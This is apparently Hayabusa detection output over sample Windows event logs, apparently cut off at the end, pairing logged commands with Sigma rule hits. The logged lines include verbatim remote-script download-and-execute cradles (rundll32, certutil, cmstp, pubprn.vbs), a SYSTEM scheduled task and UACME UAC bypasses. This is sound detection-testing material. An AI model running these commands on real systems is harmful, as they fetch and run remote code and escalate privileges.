rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: 
C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 
06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 
19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 
Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 